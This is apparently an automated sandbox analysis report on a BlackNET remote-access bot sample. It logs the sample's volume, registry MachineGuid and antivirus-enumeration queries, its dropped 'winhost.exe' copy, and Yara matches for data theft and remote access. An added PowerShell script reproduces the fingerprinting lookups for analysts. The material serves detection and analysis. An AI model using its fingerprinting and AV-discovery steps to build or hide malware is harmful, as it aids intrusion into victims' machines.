                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe  Queries volume information: C:\ VolumeInformation (8 occurrences)
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe  Queries volume information: C:\ VolumeInformation (11 occurrences)
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe  WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct (2 occurrences)
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe  WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct (3 occurrences)
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.663171745.0000000000FC1000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.675739342.0000000000D26000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000003.695758830.0000000000E2B000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.705628931.0000000001047000.00000004.00000001.sdmp, winhost.exe, 00000013.00000003.714921157.00000000005C7000.00000004.00000001.sdmp  Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
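                  The two host-fingerprinting lookups the report attributes to the sample and to its dropped copy winhost.exe (the MachineGuid registry read and the root\SecurityCenter2 AntivirusProduct WMI query) can be reproduced from an analyst's PowerShell prompt to see exactly what the bot obtains from a victim. The script below is an added example and is not code from the report or from the BlackNET project; the Decode-ProductState helper is an assumption that follows the commonly used but undocumented interpretation of the productState bit field, so treat its output as a heuristic.

```powershell
# Added example (not from the sandbox report): reproduce the two lookups the
# report shows the sample performing, so an analyst can see what is collected.

# 1. HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid: a stable per-install
#    identifier that bots commonly reuse as a victim ID.
$machineGuid = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' -Name MachineGuid).MachineGuid

# 2. The same WMI query as in the report. The root\SecurityCenter2 namespace
#    exists only on client editions of Windows; on Windows Server the query
#    returns nothing, which is why -ErrorAction SilentlyContinue is used.
$avProducts = Get-CimInstance -Namespace 'root/SecurityCenter2' -ClassName AntivirusProduct -ErrorAction SilentlyContinue

function Decode-ProductState {
    param([uint32]$State)
    # Assumption: unofficial decoding used by many tools. In the 6-digit hex
    # form, the middle byte reports real-time protection (0x10/0x11 = on) and
    # the low byte signature status (0x00 = up to date, 0x10 = out of date).
    $hex = '{0:x6}' -f $State
    [pscustomobject]@{
        RealTimeProtection = if ($hex.Substring(2, 2) -in @('10', '11')) { 'On' } else { 'Off' }
        Signatures         = if ($hex.Substring(4, 2) -eq '00') { 'UpToDate' } else { 'OutOfDate' }
    }
}

"MachineGuid: $machineGuid"
foreach ($av in $avProducts) {
    $state = Decode-ProductState -State $av.productState
    '{0} (rtp={1}, sigs={2}) exe={3}' -f $av.displayName, $state.RealTimeProtection, $state.Signatures, $av.pathToSignedProductExe
}
```

                  For hunting, the report's own lines are the useful pattern: the same AntivirusProduct query is issued first by the original executable and again by the persisted winhost.exe copy under %LOCALAPPDATA%\Temp\Microsoft\MyClient\, so an ExecQuery against root\SecurityCenter2 from a process outside known management or EDR tooling is a reasonable low-noise detection, and the MachineGuid read from the same process shortly before network activity corroborates bot registration.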

                  Stealing of Sensitive Information:

                  Yara detected BlackNET
                  Source: Yara match; file source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE
                  Source: Yara match; file source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; file source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; file source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; file source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; file source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; file source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; file source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; file source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; file source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; file source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; file source: 00000008.00000002.674613084.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match; file source: 00000010.00000000.694369153.0000000000AE2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match; file source: 0000000C.00000002.697281898.0000000000812000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match; file source: 00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match; file source: 00000000.00000002.664262498.00000000009B2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match; file source: 0000000C.00000000.685235797.0000000000812000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match; file source: 00000010.00000002.704585116.0000000000AE2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match; file source: 00000013.00000000.702548185.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match; file source: 00000008.00000000.662483550.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match; file source: 00000000.00000000.641714732.00000000009B2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match; file source: 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.701069218.0000000002FF9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 4804, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: winhost.exe PID: 6944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 6336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: winhost.exe PID: 4112, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: winhost.exe PID: 7000, type: MEMORYSTR
                  Source: Yara matchFile source: dropped/winhost.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPED

                  Remote Access Functionality:

                  Yara detected BlackNET
                  Source: Yara match | File source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE
                  Source: Yara match | File source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000008.00000002.674613084.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000000.694369153.0000000000AE2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.697281898.0000000000812000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.664262498.00000000009B2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000000.685235797.0000000000812000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.704585116.0000000000AE2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000000.702548185.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000000.662483550.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.641714732.00000000009B2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.701069218.0000000002FF9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 4804, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: winhost.exe PID: 6944, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 6336, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: winhost.exe PID: 4112, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: winhost.exe PID: 7000, type: MEMORYSTR
                  Source: Yara match | File source: dropped/winhost.exe, type: DROPPED
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  The matrix is reproduced column by column: one tactic per line, cells listed top to bottom. The digits in parentheses after a technique are the report's signature-count badges, kept exactly as extracted; techniques without a badge are the matrix's unobserved placeholder cells.

                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                  Execution: Windows Management Instrumentation (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
